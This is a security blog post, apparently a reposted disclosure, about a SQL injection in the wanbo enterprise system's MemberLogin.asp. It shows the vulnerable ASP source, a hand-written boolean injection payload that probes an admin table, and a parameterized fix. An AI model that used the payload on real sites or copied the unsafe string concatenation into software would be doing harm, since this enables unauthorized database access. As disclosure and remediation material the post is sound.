FROM http://www.st999.cn/blog
Over the past two days I have run into an enterprise management system called wanbo several times. Today I downloaded it and had a look, and found an injection vulnerability. The frustrating part is that it has to be exploited by hand; there is no way to use tools. Since I had already found one, I was not interested in looking further.
The injection is in the html/MemberLogin.asp file. The NoSqlHack.asp file in the Include directory is not called here either. Haha, so we can use it.
The MemberLogin.asp source code is as follows:
<%@ LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>
<% Option Explicit %>
<% Response.Charset = "UTF-8" %>
<!-- #Include file="../Include/Const.asp" -->
<!-- #Include file="../Include/ConnSiteData.asp" -->
<!-- #Include file="../Include/Md5.asp" -->
<%
If Request.QueryString("Action") = "Out" Then
    Session.Contents.Remove "MemName"
    Session.Contents.Remove "GroupID"
    Session.Contents.Remove "GroupLevel"
    Session.Contents.Remove "MemLogin"
    Response.Redirect CStr(Request.ServerVariables("HTTP_REFERER"))
    Response.End
End If
' Three distinct messages: unknown name, wrong password, disabled account.
Public ErrMsg(3)
ErrMsg(0) = "· Incorrect login name. Please go back."
ErrMsg(1) = "· Incorrect login password. Please go back."
ErrMsg(2) = "· This account is not in use. Please go back."
Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, SQL
LoginName = Trim(Request.Form("LoginName"))
LoginPassword = Md5(Request.Form("LoginPassword"))
Set rs = Server.CreateObject("ADODB.Recordset")
' LoginName is concatenated straight into the SQL text: this is the injection point.
SQL = "select * from NwebCn_Members where MemName = '" & LoginName & "'"
rs.Open SQL, conn, 1, 3
If rs.BOF And rs.EOF Then
    WriteMsg(ErrMsg(0))
    Response.End
Else
    MemName = rs("MemName")
    Password = rs("Password")
    GroupID = rs("GroupID")
    GroupName = rs("GroupName")
    Working = rs("Working")
End If
If LoginPassword <> Password Then
    WriteMsg(ErrMsg(1))
    Response.End
End If
If Not Working Then
    WriteMsg(ErrMsg(2))
    Response.End
End If
If UCase(LoginName) = UCase(MemName) And LoginPassword = Password Then
    rs("LastLoginTime") = Now()
    rs("LastLoginIP") = Request.ServerVariables("Remote_Addr")
    rs("LoginTimes") = rs("LoginTimes") + 1
    rs.Update
    rs.Close
    Set rs = Nothing
    Session("MemName") = MemName
    Session("GroupID") = GroupID
    '============
    Set rs = Server.CreateObject("ADODB.Recordset")
    SQL = "select * from NwebCn_MemGroup where GroupID = '" & GroupID & "'"
    rs.Open SQL, conn, 1, 1
    Session("GroupLevel") = rs("GroupLevel")
    rs.Close
    Set rs = Nothing
    '============
    Session("MemLogin") = "Succeed"
    Session.Timeout = 60
    Response.Redirect CStr(Request.ServerVariables("HTTP_REFERER"))
    Response.End
End If
%>
As you can see, LoginName is not filtered and is substituted directly into the query, which is what produces the injection. The method is a little troublesome, though: I tried and could not get a tool to work on it, which was depressing.
For example: wzasdf' and exists (select * from [nwebcn_admin]) and '1'='1
Doing it by hand really is depressing; what a lousy hole this is...
Fix (www.2cto.com): filter LoginName.
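The real fix is to stop building the statement from the raw string at all. Below is an added example, not the wanbo project's own code, that rewrites the member lookup from MemberLogin.asp with a parameterized ADODB.Command and collapses the "unknown name" and "wrong password" responses into one message, so the login page no longer acts as a true/false oracle for payloads like the one above. It assumes the same conn connection object, Md5 function and WriteMsg routine that the page's includes provide.

```vbscript
<%
' Added example (not from the original page): parameterized replacement for the
' MemName lookup in MemberLogin.asp. Assumes "conn", Md5() and WriteMsg() come
' from the same Include files as the original.
Option Explicit

Function LookupMember(conn, LoginName)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = 1 ' adCmdText
    ' "?" is a bound placeholder: quotes or keywords inside LoginName are
    ' passed as data and can never change the shape of the statement.
    cmd.CommandText = "select MemName, Password, GroupID, GroupName, Working " & _
                      "from NwebCn_Members where MemName = ?"
    ' CreateParameter(Name, Type, Direction, Size, Value)
    ' 200 = adVarChar, 1 = adParamInput; Size also caps the accepted length.
    cmd.Parameters.Append cmd.CreateParameter("MemName", 200, 1, 50, LoginName)
    Set LookupMember = cmd.Execute()
End Function

Dim LoginName, LoginPassword, rs, Failed
LoginName = Trim(Request.Form("LoginName"))
LoginPassword = Md5(Request.Form("LoginPassword"))
Set rs = LookupMember(conn, LoginName)

' VBScript's "Or" does not short-circuit, so test EOF before touching a field.
Failed = rs.EOF
If Not Failed Then Failed = (LoginPassword <> rs("Password"))

' One generic message for both failure cases: the response no longer reveals
' whether the WHERE clause matched a row.
If Failed Then
    WriteMsg("Incorrect login name or password. Please go back.")
    Response.End
End If
' ... account-status check and session setup continue as in the original ...
%>
```

Command.Execute returns a read-only, forward-only recordset, so the LastLoginTime/LastLoginIP/LoginTimes update from the original should become a separate parameterized UPDATE rather than rs.Update.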